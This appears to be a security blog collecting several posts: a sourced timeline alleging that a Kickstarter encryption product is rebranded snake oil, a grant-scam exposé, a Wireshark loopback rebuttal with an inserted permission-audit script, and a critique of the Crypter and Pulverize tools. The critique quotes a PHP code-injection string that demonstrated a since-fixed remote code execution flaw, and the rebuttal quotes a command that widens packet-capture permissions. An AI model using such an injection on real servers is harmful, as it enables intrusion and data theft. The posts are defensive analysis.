1998-07-05 - SOFNET, Inc. a/k/a SOFTNET, Inc. is incorporated by Raymond Talarico and Glenn Jackson in Florida [search.sunbiz.org]
2000-09-01 - Raymond Talarico resigns from Sci-Fi Megaplex [sec.gov]
2001-03-16 - SEC announces fraud scheme at Hawa Corporation involving future FileWarden.com director Ilona Alexis Mandelbaum of West Palm Beach, FL [sec.gov]
2001-01-01 - Raymond Talarico and Debra Towsley found Medirect Latino Inc. [sec.edgar-online.com]
2001-01-22 - Sci-Fi Megaplex files for bankruptcy [bizjournals.com]
2001-09-21 - SOFNET, Inc. is dissolved [search.sunbiz.org]
2002-01-01 - Raymond Talarico founds MGI Consultants Inc. [companiess.com]
2002-07-19 - MEDirect Latino, Inc. incorporated by Raymond Talarico and Debra Towsley in Florida [search.sunbiz.org]
2003-07-22 - State of Wisconsin issues C&D against SOFNET, Inc., Raymond Talarico, and Glenn Jackson for selling unregistered securities [wdfi.org]
2005-01-01 - IntelaKare Marketing Inc. a/k/a ikarma Inc. [otcmarkets.com]
2005-11-29 - Success Exploration and Resources, Inc. (SE&R), a mineral exploration company, incorporated in the State of Nevada [nasdaq.com]
2006-10-16 - Three directors resign from MEDirect Latino, Inc. citing irregularities [sec.edgar-online.com]
2007-02-14 - Ilona Alexis (a/k/a Roza) Mandelbaum files for bankruptcy in Florida Southern Bankruptcy Court [plainsite.org]
2007-07-11 - MGI Consultants Inc. incorporated in Nevada by Debra Towsley [nvsos.gov]
2007-11-09 - MEDirect Latino Inc. goes into default with several lenders [globenewswire.com]
2008-01-23 - HSC Holdings, LLC incorporated in Florida by Ilona Mandelbaum [search.sunbiz.org]
American Pacific Rim Commerce Group (APRM) and MGI Consultants
2010-01-01 - According to a LinkedIn account, Centuri Global is created and claims to come from Hobe Sound, Florida [linkedin.com]
2010-05-21 - Fraud lawsuit filed against HSC and Ilona Mandelbaum in Texas [nasdaq.com]
2010-06-22 - Ilona Mandelbaum and HSC Holdings sued for fraud in Texas court [dockets.justia.com]
2011-01-28 - SE&R website snapshot [successexploration.com]
2011-02-28 - IntelaKare spins off Medtino Inc. [otcmarkets.com]
2011-06-07 - SEC suspends trading of American Pacific Rim Commerce Group (APRM) [sec.gov]
2011-10-10 - SEC filing connecting SE&R in Ontario and Nevada [sec.gov]
2012-03-15 - Secured Income Reserve, Inc. incorporated in Delaware, Ilona Alexis Mandelbaum and Matthew H. Sage, Executive Officers [bizapedia.com]
2013-07-13 - centuriglobal.com registered [research.domaintools.com]
2013-07-30 - SE&R stock purchase agreement entered into by HSC Holdings, LLC and Matthew H. Sage, then appointed Officer and Director; Alexander and Jonathan Long resign as Executive Officers [marketwatch.com]
2013-07-30 - SE&R change their SIC code from Metal Mining to Computer Processing and Data Preparation [sec.gov]
2013-08-22 - Centuri Cryptor demo video posted to YouTube by Nick M. [youtube.com]
2013-09-06 - Ilona Mandelbaum appointed Secretary and Director at SE&R [bloomberg.com]
2013-09-11 - Question regarding Centuri Cryptor was posted to SpiceWorks [community.spiceworks.com]
2013-10-04 - Centuri Cryptor website appears on the Internet. Matthew H. Sage is cited as COO and Henry Mandelbaum as CTO. Nick McCord is cited as software and network administrator. [centuriglobal.xtreamsolution.com]
2013-10-13 - Centuri Cryptor Twitter account created [twitter.com]
2013-10-15 - Raymond Talarico is compensated by SE&R for services through his majority-owned company IntelaKare Marketing, Inc. with 129,400 shares of common restricted stock of SE&R and a $10,000 monthly payment. [sec.gov]
2013-10-18 - Centuri Cryptor claimed to have been presented at a nameless show at the Jacob Javits Center in New York City to a crowd of 40,000 people. Said convention centre held the PIX11 Health and Wellness Show and the 135th International AES Convention that weekend. [healthexpo.pix11plus.com]
2013-10-18 - Alan Edwards of Whitehorse Technology Solutions LLC registers unbreakable-encryption.com and provides details on Centuri's unbreakable status [unbreakable-encryption.com]
2013-10-22 - "Alan9701" of Whitehorse Technology Solutions LLC claims to have demoed the application and found it uncrackable. It was his first response to any SpiceWorks community message. [community.spiceworks.com]
2013-11-21 - Matthew Sage registers FileWarden.com with Centuri Global as the registrant organization.
2013-11-27 - Talarico registers xtremehacker.com, xtremehackergames.com, hackmeifucan.com
2013-12-11 - Raymond Talarico registers MoneyWarden.com, reflecting the FileWarden branding
2014-01-29 - Raymond J. Talarico appointed CEO of SE&R [bloomberg.com]
2014-02-12 - SE&R files name change with SEC for FileWarden.com [sec.gov]
2014-03-28 - FileWarden.com's Matthew H. Sage applies to operate a business in the State of Florida. Raymond Talarico is cited as President and Director. [search.sunbiz.org]
2014-07-11 - Raymond J. Talarico resigns as Director of Filewarden.com [bloomberg.com]
2014-07-11 - Talarico registers idataangel.com, mydataangel.com
2014-07-14 - FileWarden.com delisted from OTCBB [bloomberg.com]
2014-07-16 - Talarico registers datagatekeeper.com
2014-11-15 - Talarico registers safedatazone.com
2014-11-17 - State of Wisconsin issues C&D against Secured Income Reserve, Inc., Ilona Alexis (a/k/a Roza) Mandelbaum, Matthew H. Sage, David A. Zimmerman, and Tamda Marketing, Inc. for selling unregistered securities [wdfi.org]
2014-12-01 - MyDataAngel.com, Inc. incorporated in Florida by Debra Towsley [search.sunbiz.org]
2015-02-04 - Talarico registers mydataangle.com
2015-02-09 - FileWarden demo video posted to YouTube by "Nick Scott" [youtube.com]
2015-08-08 - Talarico registers datagatekeeper.tv, safedatazone.tv
2015-09-11 - Talarico creates a demo video on how MDA works [youtube.com]
2015-09-12 - Talarico registers dataincidentreport.com, miangeldedatos.com, mydatatv.com, worlddataheadquarters.com
2015-09-18 - "About MyDataAngel.com" posted on YouTube [youtube.com]
2015-10-23 - Talarico registers safedatasolution.com
2015-11-11 - MyDataAngel.com issues an "executive brief" [Mirror]
2015-11-24 - dataangel.news is registered by Raymond Talarico
2015-12-10 - MyDataAngel.com issues a year-end update for its investors. [Mirror]
2015-12-16 - MyDataAngel.com issues a PowerPoint presentation with an overview of their new product. Henryk (Henry) Mandelbaum is cited as CTO, Raymond Talarico as Founder and CEO, and Debra Towsley as Founder and President. [Mirror]
2016-01-15 - Talarico registers edatabuzz.com, edatanews.com, edatatareporter.com
2016-04-01 - Installation tutorial posted [youtube.com]
2016-04-01 - First use tutorial posted [youtube.com]
2016-04-05 - DataGateKeeper help document created. [Mirror]
2016-05-13 - MyDataAngel.com KickStarter is launched. [kickstarter.com]

So what does this all mean? For one, the individuals involved have been scheming for years through the use of holding companies to launch their own ventures.

Sometime shortly before 2010, Centuri Cryptor was written although based on its design, it's really tough to say if it was not started earlier, had an incompetent programmer involved, or was actually written later than what is claimed on LinkedIn. The use of controls reminiscent of Windows 3.1 is really confusing. The first evidence of the application in use does not appear on YouTube until the summer of 2013.

It is at this point that Ilona Mandelbaum arranged a compensation package for Raymond Talarico's involvement in HSC Holdings (the assumed owner of Centuri) several months after Mandelbaum's mining company transitioned into a technology one. A website was launched mentioning Henry Mandelbaum as CTO and Matthew Sage as COO.

Immediately following Talarico's involvement, promotion of Centuri began via Twitter and a supposed, nameless conference in New York City. All of this appeared to be very feckless and a non-starter however.

At some point, Matthew Sage created FileWarden.com and transitioned Centuri over to that company with him and Talarico at the helm. Talarico then resigned from FileWarden just four months later, shortly before Mandelbaum and Sage were issued a cease and desist order by the State of Wisconsin for their business activities in another organization.

Eight months later, Talarico registers MyDataAngel.com, with Henry Mandelbaum (a relative of Ilona) as CTO, Talarico as CEO, and Debra Towsley as President. In November of 2015, work begins on creating a KickStarter and involvement of investors is suggested. And now in May 2016, we have the KickStarter where they're asking for $25,000 USD but with no mention of Henry or Ilona Mandelbaum.

Does the application even exist?

It's really tough to say, but probably? The aforementioned YouTube video shows it in use, but there are a lot of problems with its claims.

The claim that its cryptography uses a kilobyte-sized key space is absurd, and the idea that AES is weak by comparison is just as absurd. They're offering fifty to one-hundred year protection, while with a correct implementation of AES you could be waiting until the heat death of the universe to crack the data.

MyDataAngel, DataGateKeeper, Centuri Cryptor, FileWarden, or whatever it is called is complete garbage. They don't need $25,000 to launch this application: it's already available, or at least was.

Here it is in 2015 (as FileWarden):

And here it is in 2013 (as Centuri):

And here's Talarico's video of him using it with Centuri's name being mentioned:

Lastly, for shits and giggles, here are some amusing folders:

Whose ethics?

My problem

KickStarter's lack of involvement in addressing these scams is really distressing, as there is no legal recourse for someone in the event that a campaign doesn't follow through on its promises. This is the third time that a campaign for outlandish security software has appeared, and I am willing to believe that there will be no response from them on preventing new ones in the future. It's really up to us as a community to pressure these snake oil products so that they never see the light of day.

Raymond Talarico and Debra Towsley don't need the $25,000 either. As evident in the PDFs I've linked to, they claim to have investors and based on the YouTube videos, the software already exists.

This is probably not the last time we'll have to write about this sort of thing either.

I'll close off with this: someone forgot to re-register centuriglobal.com, the former domain of Centuri Cryptor so it now redirects to this blog piece.

Monday, 9 May 2016

My "new" blog funded by Canadian government "grant cheques"

It's often said that imitation is the sincerest form of flattery. However, I did not expect to ever see my name used to promote some grant scheme where one could make $17,438.27 in just under two weeks.

During a random search, I came across a YouTube account bearing my full name. I only have one account that I use so I was surprised to see a video claiming to be created by me bearing a cheque with my full name.

Now, the video in question has a link to the blog itself (I will not link to it myself) which claims the following:
My life was going great... a great job working at a local engineering firm, a beautiful wife of 4 years and a young son. Sure we had some debt, but really, who doesn't? Then it happened, i lost my job! It was devastating, but the next day i was out looking for a new job. Weeks went by and as hard as i tried to find another job, no one, i mean no one was hiring! All the while our bills kept piling up and my mortgage payments were way behind. We really did think we were going to lose our home!
And then it goes on to explain how this whole grant scheme works:
One day after a job interview at a local coffee shop, i was about to sit down to enjoy a hot cup of java when i happened to bump into an old high school acquaintance. Turns out he worked for the provincial government and after explaining about my financial problems, he advised me to apply for Canadian Government Grants. I had heard about them but never really looked into it before. He explained that 90% of Canadians qualify for these grants but maybe only 5% of the population actually know about them. He gave me a website to look into and i didn't even finish my coffee, i just rushed home.
Convenient story. The last time I ran into someone from high school that told me of a financial scheme where I could make money, she tried to rope me into some multi-level marketing nonsense.

To add to this, how does one go from having worked at an engineering firm, where you're gainfully employed enough to have a mortgage on a home, to having to apply for a job at a coffee shop? I get that times are tough now in Calgary (where the author claims to be from), but this was written back in 2012 when oil prices were around $90 USD a barrel.

Rolling back here a bit, you might be wondering how a cheque bearing my name (with middle initial no less) made it online. For a bit, I was confused, but then I remembered that back in 2003, I was filing my own taxes for the first time and was sent back a cheque for a grand total of $0.07 CAD. The humorous part was that the cost to mail it would have been $0.48 CAD. Since I found it funny, I scanned a copy of the cheque, edited out details, and then posted it on a message board.

Years later, I got into the habit of editing Wikipedia to pass the time when I was living away from my hometown. When I came across the article on cheques, it at the time either had no images or didn't have enough so I decided to lend my previous scanned image. The easiest thing to assume here is that this individual decided to use the image in their video because it had a full name to make use of and fit their assumption of how convincing it would be.

I was able to confirm that this was my cheque because the monospace font matches the address I would have had at the time of the cheque's issuance. There are other people out there who have the same name as me, but it definitely was my image being used here.

Back to this whole grants nonsense, there are actual grants you can get as a business or an individual looking to run a business if you fall under some of the following as per this website with a horribly deceptive domain:
  • Employ PEI - as a PEI business owner, you can apply for a wage subsidy to hire and train eligible individuals for up to a year
  • Fuel Injection Program - your advanced manufacturing or social innovation business could access up to $30,000 in seed funding for growth projects in Southern Ontario
  • Self-Employment Assistance - if you are unemployed and want to create a job for yourself by starting your own business, you may be eligible for financial and entrepreneurial assistance
  • Sivummut Grants to Small Businesses - if you live in the Baffin (Qikiqtaaluk) region of Nunavut, you could get up to $25,000 to start or grow a business
  • B.C. Buy Local Program - if you are in the agriculture, agrifood or seafood sectors, you could receive funding up to $75,000
As you can see, there are plenty of grants available that can get you a lot of money for your existing business or to get one off of the ground. However, all of these have a lengthy-ish application process and you have to prove what you're looking to do is legitimate. This isn't some scheme where the government will throw $40,000 like the blog suggests for doing absolutely nothing, as you have to commit to doing whatever the government is trying to promote.

These grant scams are not really all that new as there have been reports about them going back to before this blog came into existence in 2012; a more recent article mentioned this scam in 2015.

The photos on the blog itself came from some stock image websites. You can see some of them here:

What a very happy family.

If you're curious about the cheque image itself, it was deleted from Wikipedia in 2011 so it doesn't appear to be anywhere on the Internet now. I do now have a cheque for $0.07 from TD due to an overpayment on a loan, but I have opted not to deposit it to see how long things go before they hound me, if at all.

I have yet to see my $17,438.27 cheque from the Canadian government.

Wednesday, 2 March 2016

This Medium post about Wireshark is the result of poor system hygiene

Ross Hosman posted this Medium entry complaining that 1Password exposes user data via the loopback interface in an unencrypted format.

Ross was nice enough to provide a "TL;DR":
TL:DR 1Password sends your password in clear text across the loopback interface if you use the browser extensions. 
Note: Running Mac OSX 10.11.3, 1Password Mac Store 6.0.1, Extension Version (Chrome)
I posted a response on Reddit but felt like sharing it here too:
This is likely the result of the OP having installed Wireshark and would otherwise not be a problem if he hadn’t done so. 
Countless guides on the Internet recommend doing something like this: 
sudo chown <username> /dev/bpf* 

Now fortunately after a reboot, these permissions get set back automatically. However, Homebrew for OS X by default implements ChmodBPF, which keeps the permissions needed so you don’t have to do this every time after you reboot.
This isn’t a Mac OS X thing either as under Windows, WinPCAP is installed, and Wireshark tells you that any user can make use of it:
The WinPcap driver (called NPF) is loaded by Wireshark when it starts to capture live data. This requires administrator privileges. Once the driver is loaded, every local user can capture from it until it’s stopped again.
So the default behaviour in Windows is to allow anyone to make use of the capture driver, and guides and Wireshark itself encourage the use of the OS X tool. Under Linux, you need to be a member of the wireshark group in order to make use of the capture interface (or just haphazardly use “root”). 
These details are important because under any other circumstance, where Wireshark or any packet capture software is not installed, what the OP complains about would be completely unnecessary to worry about, because typically (as in a default non-SELinux Linux, OS X, or Windows installation) the permissions required to sniff the loopback interface are at the same level as those required to read the key out of memory. 
His concerns are valid in a sense but having a packet capture driver with global access permissions is along the same lines as having no password on your administrator accounts. If you’re concerned about this being a real problem, run Wireshark on a separate machine or at least within a virtual machine.
Overall there is nothing to panic about unless you are running Wireshark.
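As an added illustration (not part of the original post, nor code from Wireshark or ChmodBPF), here is a small Python check for the situation described above: it classifies who can open each /dev/bpf* device, from constructed `ls -l` lines as sample input and from the real devices when run on a Mac. The access_bpf group name is the one ChmodBPF creates; the user "alice" and the device numbers are made up.

```python
import glob
import grp
import os
import pwd
import stat

# Constructed sample shaped like `ls -l /dev/bpf*` on macOS: a stock device,
# one widened by Homebrew's ChmodBPF (access_bpf group), one chown'd to a
# user as the guides suggest, and one opened to everyone.
SAMPLE_LS = """\
crw-------  1 root   wheel       0x17000000 Mar  2 09:41 /dev/bpf0
crw-rw----  1 root   access_bpf  0x17000001 Mar  2 09:41 /dev/bpf1
crw-r-----  1 alice  wheel       0x17000002 Mar  2 09:41 /dev/bpf2
crw-rw-rw-  1 root   wheel       0x17000003 Mar  2 09:41 /dev/bpf3
"""

ADMIN_GROUPS = ("wheel", "root")  # members are administrators anyway


def classify(mode: str, owner: str, group: str) -> str:
    """Say who can open a BPF device, from an ls-style mode string.

    Opening /dev/bpfN is all a process needs to capture on any interface,
    loopback included, so read access here is capture access.
    """
    if mode[7] == "r":                                 # others' read bit
        return "world"
    if owner != "root" and mode[1] == "r":             # non-root owner
        return f"user:{owner}"
    if group not in ADMIN_GROUPS and mode[4] == "r":   # group read bit
        return f"group:{group}"
    return "root-only"


def audit_ls(lines):
    """Map device -> access class for a list of `ls -l` lines."""
    report = {}
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        mode, owner, group, dev = fields[0], fields[2], fields[3], fields[-1]
        report[dev] = classify(mode, owner, group)
    return report


def _name(lookup, ident):
    """Owner/group name, falling back to the numeric id."""
    try:
        return lookup(ident)
    except KeyError:
        return str(ident)


def audit_local(pattern="/dev/bpf*"):
    """Classify the real BPF devices on this host; empty on non-macOS."""
    report = {}
    for dev in sorted(glob.glob(pattern)):
        st = os.stat(dev)
        owner = _name(lambda u: pwd.getpwuid(u).pw_name, st.st_uid)
        group = _name(lambda g: grp.getgrgid(g).gr_name, st.st_gid)
        report[dev] = classify(stat.filemode(st.st_mode), owner, group)
    return report


def risky(report):
    """Devices a non-root user could capture from, in report order."""
    return [dev for dev, cls in report.items() if cls != "root-only"]


if __name__ == "__main__":
    for name, report in (("sample", audit_ls(SAMPLE_LS.splitlines())),
                         ("this host", audit_local())):
        print(f"== {name}")
        for dev, cls in report.items():
            flag = "WARN" if cls != "root-only" else "ok  "
            print(f"{flag} {dev}: {cls}")
```

Anything other than root-only means a local, non-admin process on that machine can watch loopback traffic; the fix is to put the permissions back rather than to blame the application using the loopback interface.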

Tuesday, 9 February 2016

The hype about Crypter is misplaced and overall dangerous

My problem with cryptography boils down to this: every once in a while, someone comes along claiming that they have a system or software that will revolutionize everything. Naturally, a media frenzy ensues with minimal fact checking. The security industry then catches wind of it, and it is quickly and thoroughly demonstrated to be a pile of vaporware garbage. Then we collectively discover that the enterprising individual has also managed to secure a hefty amount of funding and has spent most of it on a swank office and catered lunches.

Recently, several media outlets gave praise to a project by a student at Sussex University named Max Mitchell. This project, called "Crypter", is a tool to enable encrypted conversations using Facebook's chat service.

Here are the headlines that were given (linked directly from Crypter's home page):
Why and how did Max Mitchell get so much coverage for his encryption tool? Likely it stems from this statement in the BGR article:
Imagine you’re Edward Snowden with a Facebook profile. You text an ace reporter at the Guardian and have a new bit of information to share: you totally found a great new coffee place in the heart of Moscow where the CIA can’t poison you with thallium. How do you send that news securely over Facebook Messenger?
On the website they do in fact use Edward Snowden in their examples:

Edward Snowden is sexy to the media and therefore it appears that Max's borrowing of his name was enough to get attention.

It got further press when Facebook reportedly "blocked" the application--in reality, something changed that Max hadn't accounted for. Of course, RT picks up on this and erroneously quotes my sarcasm on Twitter as support.

Too bad that this entire application is complete garbage and doesn't actually protect anyone.

Key exchange or lack thereof

Crypter's developer mentions that "[its] extension locally encrypts and decrypts your Facebook messages using AES encryption along with a preset password" and "[both parties] must have the same password to ensure you can encrypt and decrypt messages correctly". However, Max's proposal for a key exchange is very, very troubling.

There are entire algorithms for exchanging keys (Diffie-Hellman for example), so the idea that a static key needs to be exchanged using some other means is preposterous and someone like Edward Snowden would very likely agree. Exchanging a static key for decryption of a symmetrical encryption algorithm like AES using any other means other than what has been established is going to be made a mess of simply because users will definitely get it wrong.

This is to me the most frustrating aspect of why Crypter is really just a toy and nothing more even if the author and the media are thinking otherwise. The lack of a secure handshake between two or more parties means to me that it'll never be secure.

I ended up asking them on their Facebook page about this problem:

Crypter's website does mention www.⊗.cf (also known as pulverize.xyz), but it's in the "about" section of the page, and not in the "how to use" part, meaning that someone may end up completely missing the service and will just do something else to send the key off--such as just sending it in plaintext beforehand. Pulverize is also riddled with problems, so even if you were to use it per the author's suggestion, the claim that it is an acceptable key exchange method is laughable.

To describe Pulverize, it's a service written by Max himself where you enter some text into a field and it then generates a link that you can exchange with someone else. When someone else views it, the message is destroyed on the server's end and it displays the text itself. If one attempts to view the page again, they'll receive a message that it doesn't exist. To protect the page from being scraped by an automated service, it uses a Google Captcha service to determine whether or not you're a human being.

In theory, this idea could work, because once the link is sent to the other party and they retrieve the self-destructing message, it should exist no more. However, it doesn't take two things into account: do you trust the author to destroy the details of the key, both intentionally and properly, and do you also believe that Facebook or some other intercepting party doesn't get to it first?

Being that Pulverize is open-source, it's easy to take a look at its source code and issue tracker. Here's how it works:

  1. It generates a fixed-length string (5 characters) as the lookup key, using an insecure random number generator
  2. It writes a PHP file to the directory containing the details of the secret message
  3. The data written to the PHP file is stripped of all HTML tags, meaning that if your AES key contains any of the characters strip_tags removes, they won't show up
  4. When the link is opened by the other party, after the captcha is confirmed, it proceeds to not quite delete the file
So far we have a potentially predictable URL and data that is stripped of any characters PHP's strip_tags function removes. There's no assurance that the file is gone either: PHP's unlink function just removes the directory entry for the file, not the file data itself, which stays on disk until those blocks happen to be overwritten. So in theory, if the server running Pulverize was seized, the data may be recoverable from the hard drive; that is also assuming that the code we see on GitHub is what is actually deployed, as how can you trust that Max is even making any attempt to delete data to begin with?

To add to all this, in prior versions of Pulverize (as in up until last Friday), a remote code execution (RCE) vulnerability existed in its codebase. The aforementioned use of the strip_tags function is what replaced this particular line of code:
This meant that one could just put in the following as the text to be encoded:
<?php phpinfo()?>
Instead of seeing the above line, you'd get the output of the phpinfo function, meaning that whatever PHP code you wanted to execute would execute. This also meant that JavaScript and HTML were injectable.

For the key exchange, this would have meant that we could have read keys before anyone else, without having to worry about them being "destroyed". This sort of RCE should have been spotted from a mile away, and yet here we are with Max promoting a crypto tool alongside another tool that is completely inadequate.

Fortunately this has been fixed, but we're still dealing with a situation where we're limited in which characters are acceptable for use on the site, and where the data is not being fully scrubbed from the server. There are far, far better solutions than this, but I get the impression that Max hasn't taken the time to read up on what he's trying to achieve.

Facebook as an adversary and a lack of verification

So let's take a step back for a second, assume for a moment that we can trust Pulverize to destroy all records of that key, and look at an easy scenario that Crypter likes to portray: Facebook as the adversary.

Ignoring the fact that if Facebook were an adversary you wouldn't be using it in the first place, how do you know that Facebook isn't intercepting the key exchange itself?

Here are things that Facebook is in control of here:
  1. All messages going back and forth between all involved parties
  2. The formatting of the messages coming in and going out
  3. The collection and storage of the conversation
So what's to stop Facebook from doing the following:
  • Intercepting a key exchange using Pulverize and then feeding a different link to the other party
  • Interfering with the application by changing the page so you think that you're using Crypter when in fact you're using something Facebook is serving up
  • Using the reduced character set available for the key to narrow down a brute-force search for it
With the first point, this does require some human intervention, as Pulverize requires you to go through an image-based captcha in order to create and retrieve encoded text. So yes, it would be difficult for Facebook to automatically retrieve the key without either party becoming aware, but what if a human decided to intervene?

We have no verification that the other party is receiving the correct key. In fact, we have no verification that the Pulverize URL the other party receives is the URL that was sent. If we're dealing with a situation where Facebook has been coerced into intercepting traffic from one party to another, what's to stop them from going through this process?
  1. Intercept and monitor all messages using a human actor
  2. Wait for a Pulverize URL to come in, grab that URL, note the key, make a new Pulverize URL with said key, and then pass the message on
  3. Intercept and decode all messages using the preset key
Since the Pulverize URLs would supposedly be gone and the key stays the same for the whole conversation, there is no way to confirm whether or not an adversary has access to the messages.

To add to this, how Crypter goes about enciphering and deciphering text is also worrying.

Here's the encryption process:
var encrypt = tag+CryptoJS.AES.encrypt(messageContent, getPass($(this)))+tag;
Here's the decryption process:
var decrypt = CryptoJS.AES.decrypt($(this).attr("id"), getPass($(this))).toString(CryptoJS.enc.Utf8);
What's missing here? There's no authentication of the message: Max has opted to just encipher and decipher the text without verifying that the ciphertext being decrypted is the one the sender actually produced. There are other things to add to this as well (how the key is used is one problem: the preset password is handed straight to CryptoJS, which turns it into the AES key with a single pass of MD5), but fundamentally there is no integrity protection on the message being sent.

Crypter is garbage and should not be used. I've seen bad things before and have ranted on similar topics, but this takes the cake considering the coverage it got.

Closing off and venting

How does Max know that both parties are getting the messages that they intend to get? Of course, this is what he believes:
Talking encrypted with no password (impossible to do with Crypter) is more secure and private than having no password. We doubt Facebook bots are able to decrypt encrypted text (even if the encrypted text doesn't have a password). We built crypter to *help* with internet security similarly to PGP's (*pretty good* encryption) philosophy but our main ethos is actually privacy. We want to make it harder for facebook and the NSA to know what people are saying to each other over Facebook (see more about us on our website www.crypter.co.uk). We are not claiming that this is a 'bullet proof' application and we don't believe we are "reinventing the wheel". We just see it as having put two things together - Encryption and Facebook.
And what does the website say?
It’s human nature to want privacy. In light of Edward Snowden’s Global Surveillance disclosures, people don’t want their messages stored and analysed regardless of whether their topic of discussion is illegal. Crypter can put millions of people at ease.
So how do you reconcile "putting people at ease" with "it's not bullet-proof"?

Of course, TechCrunch sees it this way:

I’d have a hard time trusting my secret tiramisu recipe to any service. Mitchell has created something that is nearly invisible and seems like it might be a good one-off solution to secure communications between friends, reporters, and secret dessert lovers.
The thing that Max Mitchell and media outlets seem to overlook is that if an adversary is after you, Facebook and similar services will never be able to provide a secure platform to communicate over. If Edward Snowden were using Facebook to chat and using Crypter, I can promise you that at some point somewhere the conversations would be compromised.

There are better solutions out there too. I accused Max of reinventing the wheel, and for good reason: why not use OTR? A native JavaScript implementation has existed for years and is actively developed. While I lament anything JS-based, it would have been far better than what Max went and implemented.

If Max had been paying attention to the whole Edward Snowden fiasco, he'd have known that the secure e-mail service Snowden used, centralised just like Pulverize, was shut down under pressure to hand over further information.

I hope that Max sees the light and stops before he does any further damage.